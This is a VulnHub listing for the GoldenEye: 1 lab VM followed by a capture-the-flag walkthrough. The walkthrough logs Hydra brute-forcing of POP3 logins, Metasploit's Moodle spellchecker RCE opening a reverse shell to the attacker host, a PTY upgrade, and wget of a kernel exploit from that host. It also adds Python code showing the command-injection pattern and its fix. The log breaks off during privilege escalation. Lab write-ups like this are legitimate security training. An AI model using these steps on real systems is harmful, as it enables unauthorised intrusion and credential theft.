GOLDENEYE: 1
About Release
Download
Please remember that VulnHub is a free community resource, so we are unable to check the machines that are provided to us. Before you download, please read our FAQ sections dealing with the dangers of running unknown VMs and our suggestions for "protecting yourself and your network". If you understand the risks, please download!
- GoldenEye-v1.ova (Size: 805 MB)
- Download: https://drive.google.com/open?id=1M7mMdSMHHpiFKW3JLqq8boNrI95Nv4tq
- Download (Mirror): https://download.vulnhub.com/goldeneye/GoldenEye-v1.ova
Description
I recently got done creating an OSCP type vulnerable machine that’s themed after the great James Bond film (and even better n64 game) GoldenEye. The goal is to get root and capture the secret GoldenEye codes - flag.txt.
I’d rate it as Intermediate, it has a good variety of techniques needed to get root - no exploit development/buffer overflows. After completing the OSCP I think this would be a great one to practice on, plus there’s a hint of CTF flavor.
I've created and validated on VMware and VirtualBox. You won't need any extra tools other than what's on Kali by default. It will need to be set up as Host-Only, and on VMware you may need to click "retry" if prompted upon initially starting it up, because of formatting.
Changelog
- Beta - 2018-05-02
- v1 - 2018-05-04
File Information
- Filename: GoldenEye-v1.ova
- File size: 805 MB
- MD5: 76C4A898F4BF0D9071C6B7E0A49D7BA8
- SHA1: B2A736B84A013B5FAB7F8C016C1D29D26F3A6D23
Virtual Machine
- Format: Virtual Machine (Virtualbox - OVA)
- Operating System: Linux
Networking
- DHCP service: Enabled
- IP address: Automatically assign
Screenshots
Currently scanning: 172.27.157.0/16 | Screen View: Unique Hosts
20 Captured ARP Req/Rep packets, from 4 hosts. Total size: 1200
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.219.1 f2:18:98:21:29:69 4 240 Unknown vendor
192.168.219.2 00:50:56:f1:66:62 5 300 VMware, Inc.
192.168.219.179 00:0c:29:fd:c5:49 4 240 VMware, Inc.
192.168.219.254 00:50:56:ed:88:be 7 420 VMware, Inc.
http://192.168.219.179/
http://192.168.219.179/terminal.js
<html>
<head>
<title>GoldenEye Primary Admin Server</title>
<link rel="stylesheet" href="index.css">
</head>
<span id="GoldenEyeText" class="typeing"></span><span class='blinker'> </span>
<script src="terminal.js"></script>
</html>
var data = [
{
GoldenEyeText: "<span><br/>Severnaya Auxiliary Control Station<br/>****TOP SECRET ACCESS****<br/>Accessing Server Identity<br/>Server Name:....................<br/>GOLDENEYE<br/><br/>User: UNKNOWN<br/><span>Naviagate to /sev-home/ to login</span>"
}
];
//
//Boris, make sure you update your default password.
//My sources say MI6 maybe planning to infiltrate.
//Be on the lookout for any suspicious network traffic....
//
//I encoded you p@ssword below...
//
//InvincibleHack3r
//
//BTW Natalya says she can break your codes
//
var allElements = document.getElementsByClassName("typeing");
for (var j = 0; j < allElements.length; j++) {
var currentElementId = allElements[j].id;
var currentElementIdContent = data[0][currentElementId];
var element = document.getElementById(currentElementId);
var devTypeText = currentElementIdContent;
var i = 0, isTag, text;
(function type() {
text = devTypeText.slice(0, ++i);
if (text === devTypeText) return;
element.innerHTML = text + `<span class='blinker'> </span>`;
var char = text.slice(-1);
if (char === "<") isTag = true;
if (char === ">") isTag = false;
if (isTag) return type();
setTimeout(type, 60);
})();
}
Decoding the encoded comment in terminal.js (for instance with http://www.esjson.com/unicodeEncode.html) gives Boris's password:
InvincibleHack3r
GOLDENEYE
GoldenEye is a Top Secret Soviet oribtal weapons project. Since you have access you definitely hold a Top Secret clearance and qualify to be a certified GoldenEye Network Operator (GNO)
Please email a qualified GNO supervisor to receive the online GoldenEye Operators Training to become an Administrator of the GoldenEye system
Remember, since security by obscurity is very effective, we have configured our pop3 service to run on a very high non-default port
┌──(pinginglab㉿pinginglab)-[~]
└─$ sudo nmap -sC -sV -p1024-65535 192.168.219.179
[sudo] password for pinginglab:
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-24 20:09 CST
Nmap scan report for 192.168.219.179 (192.168.219.179)
Host is up (0.00077s latency).
Not shown: 64510 closed tcp ports (reset)
PORT STATE SERVICE VERSION
55006/tcp open ssl/pop3 Dovecot pop3d
|_pop3-capabilities: PIPELINING SASL(PLAIN) USER AUTH-RESP-CODE CAPA RESP-CODES TOP UIDL
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2018-04-24T03:23:52
|_Not valid after: 2028-04-23T03:23:52
55007/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: CAPA STLS RESP-CODES UIDL PIPELINING AUTH-RESP-CODE USER TOP SASL(PLAIN)
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2018-04-24T03:23:52
|_Not valid after: 2028-04-23T03:23:52
|_ssl-date: TLS randomness does not represent time
MAC Address: 00:0C:29:FD:C5:49 (VMware)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.35 seconds
┌──(pinginglab㉿pinginglab)-[~]
└─$ nc 192.168.219.179 55007
+OK GoldenEye POP3 Electronic-Mail System
http://192.168.219.179/sev-home/
<html>
<head>
<link rel="stylesheet" href="index.css">
</head>
<video poster="val.jpg" id="bgvid" playsinline autoplay muted loop>
<source src="moonraker.webm" type="video/webm">
</video>
<div id="golden">
<h1>GoldenEye</h1>
<p>GoldenEye is a Top Secret Soviet oribtal weapons project. Since you have access you definitely hold a Top Secret clearance and qualify to be a certified GoldenEye Network Operator (GNO) </p>
<p>Please email a qualified GNO supervisor to receive the online <b>GoldenEye Operators Training</b> to become an Administrator of the GoldenEye system</p>
<p>Remember, since <b><i>security by obscurity</i></b> is very effective, we have configured our pop3 service to run on a very high non-default port</p>
</div>
<script src="index.js"></script>
<!--
Qualified GoldenEye Network Operator Supervisors:
Natalya
Boris
-->
</html>
Save the two supervisor names from the HTML comment as a user list (vim 1.txt):
┌──(pinginglab㉿pinginglab)-[~/vulnhub/goldeneye]
└─$ cat 1.txt
Natalya
Boris
┌──(pinginglab㉿pinginglab)-[~/vulnhub/goldeneye]
└─$ hydra -L 1.txt -P /usr/share/wordlists/fasttrack.txt pop3://192.168.219.179:55007
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-12-24 20:19:00
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 16 tasks per 1 server, overall 16 tasks, 444 login tries (l:2/p:222), ~28 tries per task
[DATA] attacking pop3://192.168.219.179:55007/
[STATUS] 80.00 tries/min, 80 tries in 00:01h, 364 to do in 00:05h, 16 active
[55007][pop3] host: 192.168.219.179 login: Natalya password: bird
[STATUS] 101.00 tries/min, 303 tries in 00:03h, 141 to do in 00:02h, 16 active
[ERROR] POP3 PLAIN AUTH : -ERR Disconnected for inactivity during authentication.
[ERROR] POP3 PLAIN AUTH : -ERR Disconnected for inactivity during authentication.
[ERROR] POP3 PLAIN AUTH : -ERR Disconnected for inactivity during authentication.
[ERROR] POP3 PLAIN AUTH : -ERR Disconnected for inactivity during authentication.
[ERROR] POP3 PLAIN AUTH : -ERR Disconnected for inactivity during authentication
[ERROR] POP3 PLAIN AUTH : -ERR Disconnected for inactivity during authentication.
[ERROR] POP3 PLAIN AUTH : -ERR Disconnected for inactivity during authentication.
[STATUS] 91.50 tries/min, 366 tries in 00:04h, 78 to do in 00:01h, 16 active
[55007][pop3] host: 192.168.219.179 login: Boris password: secret1!
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-12-24 20:23:36
┌──(pinginglab㉿pinginglab)-[~]
└─$ nc 192.168.219.179 55007
+OK GoldenEye POP3 Electronic-Mail System
Natalya
-ERR Unknown command.
user:Natalya
-ERR Unknown command.
USER Natalya
+OK
PASS bird
+OK Logged in.
-ERR Unknown command:
ls
-ERR Unknown command: LS
retr 1
+OK 631 octets
Return-Path: <root@ubuntu>
X-Original-To: natalya
Delivered-To: natalya@ubuntu
Received: from ok (localhost [127.0.0.1])
by ubuntu (Postfix) with ESMTP id D5EDA454B1
for <natalya>; Tue, 10 Apr 1995 19:45:33 -0700 (PDT)
Message-Id: <20180425024542.D5EDA454B1@ubuntu>
Date: Tue, 10 Apr 1995 19:45:33 -0700 (PDT)
From: root@ubuntu
Natalya, please you need to stop breaking boris' codes. Also, you are GNO supervisor for training. I will email you once a student is designated to you.
Also, be cautious of possible network breaches. We have intel that GoldenEye is being sought after by a crime syndicate named Janus.
.
retr 2
+OK 1048 octets
Return-Path: <root@ubuntu>
X-Original-To: natalya
Delivered-To: natalya@ubuntu
Received: from root (localhost [127.0.0.1])
by ubuntu (Postfix) with SMTP id 17C96454B1
for <natalya>; Tue, 29 Apr 1995 20:19:42 -0700 (PDT)
Message-Id: <20180425031956.17C96454B1@ubuntu>
Date: Tue, 29 Apr 1995 20:19:42 -0700 (PDT)
From: root@ubuntu
Ok Natalyn I have a new student for you. As this is a new system please let me or boris know if you see any config issues, especially is it's related to security...even if it's not, just enter it in under the guise of "security"...it'll get the change order escalated without much hassle :)
Ok, user creds are:
username: xenia
password: RCP90rulez!
Boris verified her as a valid contractor so just create the account ok?
And if you didn't have the URL on outr internal Domain: severnaya-station.com/gnocertdir
**Make sure to edit your host file since you usually work remote off-network....
Since you're a Linux user just point this servers IP to severnaya-station.com in /etc/hosts.
.
show
-ERR Unknown command: SHOW
list
+OK 2 messages:
1 631
2 1048
.
┌──(pinginglab㉿pinginglab)-[~]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 pinginglab
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
127.0.0.1 updates.acunetix.com
127.0.0.1 erp.acunetix.com
192.168.219.179 severnaya-station.com
username: xenia
password: RCP90rulez!
┌──(pinginglab㉿pinginglab)-[~/vulnhub/goldeneye]
└─$ hydra -l Doak -P /usr/share/wordlists/fasttrack.txt pop3://192.168.219.179:55007
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-12-24 20:38:25
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 222 login tries (l:1/p:222), ~14 tries per task
[DATA] attacking pop3://192.168.219.179:55007/
[STATUS] 80.00 tries/min, 80 tries in 00:01h, 142 to do in 00:02h, 16 active
[STATUS] 64.00 tries/min, 128 tries in 00:02h, 94 to do in 00:02h, 16 active
[55007][pop3] host: 192.168.219.179 login: Doak password: goat
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-12-24 20:40:56
┌──(pinginglab㉿pinginglab)-[~]
└─$ nc 192.168.219.179 55007
+OK GoldenEye POP3 Electronic-Mail System
USER Doak
+OK
PASS goat
+OK Logged in.
list
+OK 1 messages:
1 606
.
retr 1
+OK 606 octets
Return-Path: <doak@ubuntu>
X-Original-To: doak
Delivered-To: doak@ubuntu
Received: from doak (localhost [127.0.0.1])
by ubuntu (Postfix) with SMTP id 97DC24549D
for <doak>; Tue, 30 Apr 1995 20:47:24 -0700 (PDT)
Message-Id: <20180425034731.97DC24549D@ubuntu>
Date: Tue, 30 Apr 1995 20:47:24 -0700 (PDT)
From: doak@ubuntu
James,
If you're reading this, congrats you've gotten this far. You know how tradecraft works right?
Because I don't. Go to our training site and login to my account....dig until you can exfiltrate further information......
username: dr_doak
password: 4England!
.
007,
I was able to capture this apps adm1n cr3ds through clear txt.
Text throughout most web apps within the GoldenEye servers are scanned, so I cannot add the cr3dentials here.
Something juicy is located here: /dir007key/for-007.jpg
Also as you may know, the RCP-90 is vastly superior to any other weapon and License to Kill is the only way to play.
http://192.168.219.179/dir007key/for-007.jpg
┌──(pinginglab㉿pinginglab)-[~/vulnhub/goldeneye]
└─$ exiftool for-007.jpg
ExifTool Version Number : 12.52
File Name : for-007.jpg
Directory : .
File Size : 15 kB
File Modification Date/Time : 2022:12:24 20:47:35+08:00
File Access Date/Time : 2022:12:24 20:48:13+08:00
File Inode Change Date/Time : 2022:12:24 20:47:47+08:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
X Resolution : 300
Y Resolution : 300
Exif Byte Order : Big-endian (Motorola, MM)
Image Description : eFdpbnRlcjE5OTV4IQ==
Make : GoldenEye
Resolution Unit : inches
Software : linux
Artist : For James
Y Cb Cr Positioning : Centered
Exif Version : 0231
Components Configuration : Y, Cb, Cr, -
User Comment : For 007
Flashpix Version : 0100
Image Width : 313
Image Height : 212
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:4:4 (1 1)
Image Size : 313x212
Megapixels : 0.066
┌──(pinginglab㉿pinginglab)-[~/vulnhub/goldeneye]
└─$
The Image Description field is base64; decoded: xWinter1995x!
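The exiftool listing above and the decode step are easy to do by hand once; the following is an added example (not part of the original post or the VM) that does the same thing programmatically: a minimal parser for the JPEG APP1/Exif segment that pulls the ASCII tags straight out of IFD0 and base64-decodes any value that looks encoded. It runs on a JPEG constructed inline with the values exiftool printed (a stand-in, not the real for-007.jpg); the function names and the sample bytes are assumptions, and on the real file you would pass `open("for-007.jpg", "rb").read()` to `hidden_strings`.

```python
import base64
import binascii
import re
import struct

# Tag numbers of the EXIF/TIFF ASCII fields that exiftool printed for for-007.jpg
TAGS = {0x010E: "ImageDescription", 0x010F: "Make", 0x0131: "Software", 0x013B: "Artist"}
ASCII = 2  # TIFF field type for NUL-terminated ASCII strings


def build_exif_jpeg(fields, byte_order=">"):
    """Construct a minimal JPEG (SOI, one APP1/Exif segment, EOI) whose IFD0 carries
    the given {tag: text} ASCII fields. Constructed test input, not the real image;
    byte_order '>' = Motorola/MM (as on the page), '<' = Intel/II."""
    entries = sorted(fields.items())
    data_offset = 8 + 2 + 12 * len(entries) + 4  # TIFF header + count + entries + next-IFD
    ifd, blob = b"", b""
    for tag, text in entries:
        value = text.encode("ascii") + b"\x00"
        if len(value) <= 4:  # short values are stored inside the 12-byte entry
            ifd += struct.pack(byte_order + "HHI4s", tag, ASCII, len(value), value.ljust(4, b"\x00"))
        else:                # longer values live after the IFD, referenced by offset
            ifd += struct.pack(byte_order + "HHII", tag, ASCII, len(value), data_offset + len(blob))
            blob += value
    tiff = (b"MM" if byte_order == ">" else b"II") + struct.pack(byte_order + "HI", 42, 8)
    tiff += struct.pack(byte_order + "H", len(entries)) + ifd + struct.pack(byte_order + "I", 0) + blob
    payload = b"Exif\x00\x00" + tiff
    return b"\xff\xd8" + b"\xff\xe1" + struct.pack(">H", len(payload) + 2) + payload + b"\xff\xd9"


def exif_ascii_fields(jpeg):
    """Walk the JPEG segment chain, find APP1/Exif and return {tag name: text}
    for every ASCII entry in IFD0 (the fields exiftool showed above)."""
    if jpeg[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG (missing SOI)")
    pos = 2
    while pos + 4 <= len(jpeg) and jpeg[pos] == 0xFF:
        marker = jpeg[pos + 1]
        if marker in (0xD9, 0xDA):  # EOI or start of scan: no more metadata segments
            break
        length = struct.unpack(">H", jpeg[pos + 2:pos + 4])[0]
        segment = jpeg[pos + 4:pos + 2 + length]
        if marker == 0xE1 and segment.startswith(b"Exif\x00\x00"):
            return _parse_ifd0(segment[6:])
        pos += 2 + length
    return {}


def _parse_ifd0(tiff):
    bo = {b"MM": ">", b"II": "<"}[tiff[:2]]
    magic, ifd0 = struct.unpack(bo + "HI", tiff[2:8])
    if magic != 42:
        raise ValueError("bad TIFF header")
    count = struct.unpack(bo + "H", tiff[ifd0:ifd0 + 2])[0]
    fields = {}
    for i in range(count):
        e = ifd0 + 2 + 12 * i
        tag, ftype, n = struct.unpack(bo + "HHI", tiff[e:e + 8])
        if ftype != ASCII:
            continue
        if n <= 4:
            raw = tiff[e + 8:e + 8 + n]
        else:
            off = struct.unpack(bo + "I", tiff[e + 8:e + 12])[0]
            raw = tiff[off:off + n]
        fields[TAGS.get(tag, f"0x{tag:04X}")] = raw.rstrip(b"\x00").decode("ascii", "replace")
    return fields


_B64 = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def decode_if_base64(text):
    """Return the decoded printable string if `text` is well-formed base64, else None."""
    if len(text) % 4 or not _B64.match(text):
        return None
    try:
        decoded = base64.b64decode(text, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return decoded if decoded.isprintable() else None


def hidden_strings(jpeg):
    """Fields whose value base64-decodes cleanly: the check that turns the
    Image Description above into the admin password."""
    out = {}
    for name, value in exif_ascii_fields(jpeg).items():
        decoded = decode_if_base64(value)
        if decoded is not None:
            out[name] = decoded
    return out


# Constructed stand-in for for-007.jpg carrying the metadata values printed above.
SAMPLE_JPEG = build_exif_jpeg({0x010E: "eFdpbnRlcjE5OTV4IQ==", 0x010F: "GoldenEye",
                               0x0131: "linux", 0x013B: "For James"})

if __name__ == "__main__":
    print(exif_ascii_fields(SAMPLE_JPEG))
    print(hidden_strings(SAMPLE_JPEG))  # {'ImageDescription': 'xWinter1995x!'}
```

The parser deliberately reads only IFD0 ASCII tags, which is where exiftool found the string; a real file may also carry an Exif sub-IFD and maker notes, which this does not descend into.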
Log in to Moodle (http://severnaya-station.com/gnocertdir) as admin with the password recovered from the image. The admin text-editor settings let you point the TinyMCE spell checker at a command of your choosing, which the server runs as the web-server user when a spell check is triggered; the Metasploit module below automates exactly this and returns a shell.
┌──(pinginglab㉿pinginglab)-[~/vulnhub/goldeneye]
└─$ msfconsole
To use retry middleware with Faraday v2.0+, install `faraday-retry` gem
IIIIII dTb.dTb _.---._
II 4' v 'B .'"".'/|\`.""'.
II 6. .P : .' / | \ `. :
II 'T;. .;P' '.' / | \ `.'
II 'T; ;P' `. / | \ .'
IIIIII 'YvP' `-.__|__.-'
I love shells --egypt
=[ metasploit v6.2.1-dev ]
+ -- --=[ 2225 exploits - 1171 auxiliary - 398 post ]
+ -- --=[ 867 payloads - 45 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: Search can apply complex filters such as
search cve:2009 type:exploit, see all the filters
with help search
msf6 > search moodle
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/moodle_admin_shell_upload 2019-04-28 excellent Yes Moodle Admin Shell Upload
1 exploit/multi/http/moodle_spelling_binary_rce 2013-10-30 excellent Yes Moodle Authenticated Spelling Binary RCE
2 exploit/multi/http/moodle_spelling_path_rce 2021-06-22 excellent Yes Moodle SpellChecker Path Authenticated Remote Command Execution
3 exploit/multi/http/moodle_teacher_enrollment_priv_esc_to_rce 2020-07-20 good Yes Moodle Teacher Enrollment Privilege Escalation to RCE
Interact with a module by name or index. For example info 3, use 3 or use exploit/multi/http/moodle_teacher_enrollment_priv_esc_to_rce
msf6 > use 1
msf6 exploit(multi/http/moodle_spelling_binary_rce) > show options
Module options (exploit/multi/http/moodle_spelling_binary_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD yes Password to authenticate with
Proxies no A proxy chain of format type:host:port[,
type:host:port][...]
RHOSTS yes The target host(s), see https://github.c
om/rapid7/metasploit-framework/wiki/Usin
g-Metasploit
RPORT 80 yes The target port (TCP)
SESSKEY no The session key of the user to impersona
te
SSL false no Negotiate SSL/TLS for outgoing connectio
ns
TARGETURI /moodle/ yes The URI of the Moodle installation
USERNAME admin yes Username to authenticate with
VHOST no HTTP server virtual host
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(multi/http/moodle_spelling_binary_rce) > set PASSWORD xWinter1995x!
PASSWORD => xWinter1995x!
msf6 exploit(multi/http/moodle_spelling_binary_rce) > set USERNAME admin
USERNAME => admin
msf6 exploit(multi/http/moodle_spelling_binary_rce) > set rhosts severnaya-station.com
rhosts => severnaya-station.com
msf6 exploit(multi/http/moodle_spelling_binary_rce) > set targeturi /gnocertdir
targeturi => /gnocertdir
msf6 exploit(multi/http/moodle_spelling_binary_rce) > set lhost 192.168.219.177
lhost => 192.168.219.177
msf6 exploit(multi/http/moodle_spelling_binary_rce) > exploit
[-] Exploit failed: A payload has not been selected.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/http/moodle_spelling_binary_rce) > set payload cmd/unix/
set payload cmd/unix/bind_perl
set payload cmd/unix/bind_perl_ipv6
set payload cmd/unix/bind_ruby
set payload cmd/unix/bind_ruby_ipv6
set payload cmd/unix/generic
set payload cmd/unix/reverse
set payload cmd/unix/reverse_bash_telnet_ssl
set payload cmd/unix/reverse_perl
set payload cmd/unix/reverse_perl_ssl
set payload cmd/unix/reverse_python
set payload cmd/unix/reverse_python_ssl
set payload cmd/unix/reverse_ruby
set payload cmd/unix/reverse_ruby_ssl
set payload cmd/unix/reverse_ssl_double_telnet
msf6 exploit(multi/http/moodle_spelling_binary_rce) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf6 exploit(multi/http/moodle_spelling_binary_rce) > exploit
[*] Started reverse TCP double handler on 192.168.219.177:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Exploitable Moodle version 2.2 detected
[*] Authenticating as user: admin
[*] Getting session key to update spellchecker if no session key was specified
[*] Updating spellchecker to use the system aspell
[*] Triggering payload
id
[-] Exploit aborted due to failure: payload-failed: Error triggering payload
[*] Exploit completed, but no session was created.
msf6 exploit(multi/http/moodle_spelling_binary_rce) >
msf6 exploit(multi/http/moodle_spelling_binary_rce) > id
[*] exec: id
uid=1000(pinginglab) gid=1000(pinginglab) groups=1000(pinginglab),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),109(netdev),121(wireshark),126(bluetooth),138(scanner),146(kaboxer),148(docker)
msf6 exploit(multi/http/moodle_spelling_binary_rce) > exploit
[*] Started reverse TCP double handler on 192.168.219.177:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Exploitable Moodle version 2.2 detected
[*] Authenticating as user: admin
[*] Getting session key to update spellchecker if no session key was specified
[*] Updating spellchecker to use the system aspell
[*] Triggering payload
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo lLIiHWNqouPcOHQu;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "lLIiHWNqouPcOHQu\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.219.177:4444 -> 192.168.219.179:33338) at 2022-12-24 21:52:49 +0800
1
sh: 7: 1: not found
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
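The module's log line "Updating spellchecker to use the system aspell" is the whole bug: a setting meant to hold the path of a binary ends up executed through a shell. The following is an added illustration in Python modelling that pattern, not Moodle's own code (Moodle is PHP): the vulnerable form beside a hardened one. The function names, the INJECTED_PATH value and the allowlist are assumptions; the vulnerable function really runs the injected command, so it only uses /bin/echo.

```python
import os
import stat
import subprocess

# Constructed attacker value: what an admin would paste into the "path to aspell" setting.
INJECTED_PATH = "/bin/echo aspell; echo INJECTED"


def spellcheck_vulnerable(aspell_path, text):
    """Pattern behind the RCE exploited above: the configured binary path is spliced
    into a command string and handed to /bin/sh, so ';', '|' or '$(...)' inside the
    setting run as extra commands under the web-server account."""
    cmd = f"{aspell_path} -a --lang=en"
    proc = subprocess.run(cmd, shell=True, input=text, capture_output=True, text=True)
    return proc.stdout


def spellcheck_hardened(aspell_path, text, allowed=frozenset({"aspell", "hunspell"})):
    """Hardened form: treat the setting as data, not as a command. Accept only an
    absolute path whose basename is on an allowlist and which is an existing regular
    executable, then exec it with an argv list so no shell ever parses the string."""
    if not os.path.isabs(aspell_path) or os.path.basename(aspell_path) not in allowed:
        raise ValueError(f"spell-checker binary not allowed: {aspell_path!r}")
    try:
        mode = os.stat(aspell_path).st_mode
    except OSError as exc:
        raise ValueError(f"spell-checker binary not found: {aspell_path!r}") from exc
    if not stat.S_ISREG(mode) or not os.access(aspell_path, os.X_OK):
        raise ValueError(f"spell-checker binary not executable: {aspell_path!r}")
    proc = subprocess.run([aspell_path, "-a", "--lang=en"], input=text, capture_output=True, text=True)
    return proc.stdout


def demo():
    """Return (did the injection run through the vulnerable path?, did the hardened path reject it?)."""
    ran = "INJECTED" in spellcheck_vulnerable(INJECTED_PATH, "hello")
    try:
        spellcheck_hardened(INJECTED_PATH, "hello")
        blocked = False
    except ValueError:
        blocked = True
    return ran, blocked


if __name__ == "__main__":
    print(demo())  # (True, True)
```

The allowlist plus argv-list execution is the real fix; note that even the hardened form still lets a web admin choose which of the listed binaries runs, so the setting should also be restricted to administrators who are trusted with code execution on the host.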
Privilege escalation
┌──(pinginglab㉿pinginglab)-[~]
└─$ searchsploit Linux ubuntu 3.13.
------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------- ---------------------------------
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/1 | linux/local/37292.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/1 | linux/local/37293.txt
Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.04/13.10 x6 | linux_x86-64/local/31347.c
Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.10) - 'CONF | linux/local/31346.c
Linux Kernel 4.10.5 / < 4.14.3 (Ubuntu) - DCCP S | linux/dos/43234.c
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) | linux/local/45010.c
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Loca | linux/local/44298.c
Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'ne | linux_x86-64/local/44300.c
Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14. | linux/local/43418.c
Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.0 | linux/local/47169.c
Ubuntu < 15.10 - PT Chown Arbitrary PTs Access V | linux/local/41760.txt
------------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(pinginglab㉿pinginglab)-[~]
└─$
Notes before running the kernel exploit: the target has no gcc, only cc (clang), so the exploit must be compiled with cc, and the source must be edited so that the gcc call it makes at run time (to build its helper shared library) uses cc as well. First upgrade the dumb shell to a PTY:
python -c 'import pty; pty.spawn("/bin/bash")'
<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$
<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ uname -a
uname -a
Linux ubuntu 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ iid
iid
No command 'iid' found, did you mean:
Command 'id' from package 'coreutils' (main)
Command 'ibid' from package 'ibid' (universe)
Command 'eid' from package 'id-utils' (universe)
Command 'ii' from package 'ii' (universe)
Command 'fid' from package 'id-utils' (universe)
Command 'kid' from package 'python-kid' (universe)
Command 'aid' from package 'id-utils' (universe)
Command 'gid' from package 'id-utils' (universe)
Command 'lid' from package 'id-utils' (universe)
Command 'lid' from package 'libuser' (universe)
iid: command not found
<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ uname -a
uname -a
Linux ubuntu 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ ls
ls
changelog.txt config.php editor_plugin.js img rpc.php
classes css editor_plugin_src.js includes
<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ wget http://192.168.219.177:8888/37292.c
<.9/plugins/spellchecker$ wget http://192.168.219.177:8888/37292.c
--2022-12-24 05:58:55-- http://192.168.219.177:8888/37292.c
Connecting to 192.168.219.177:8888... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4968 (4.9K) [text/x-csrc]
Saving to: '37292.c'
100%[======================================>] 4,968 --.-K/s in 0s
2022-12-24 05:58:55 (975 MB/s) - '37292.c' saved [4968/4968]
<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ wget http://192.168.219.177:8888/37292.c
<.9/plugins/spellchecker$ wget http://192.168.219.177:8888/37292.c
--2022-12-24 06:00:20-- http://192.168.219.177:8888/37292.c
Connecting to 192.168.219.177:8888... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4968 (4.9K) [text/x-csrc]
Saving to: '37292.c.1'
100%[======================================>] 4,968 --.-K/s in 0s
2022-12-24 06:00:20 (789 MB/s) - '37292.c.1' saved [4968/4968]
<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ ls
ls
37292.c changelog.txt config.php editor_plugin.js img rpc.php
37292.c.1 classes css editor_plugin_src.js includes
<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ cc -o exp2 37292.c.1
cc -o exp2 37292.c.1
37292.c.1: file not recognized: File format not recognized
clang: error: linker command failed with exit code 1 (use -v to see invocation)
<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ cc
cc
clang: error: no input files
<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ cc -h
cc -h
clang: error: unknown argument: '-h'
clang: error: no input files
<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ gcc
gcc
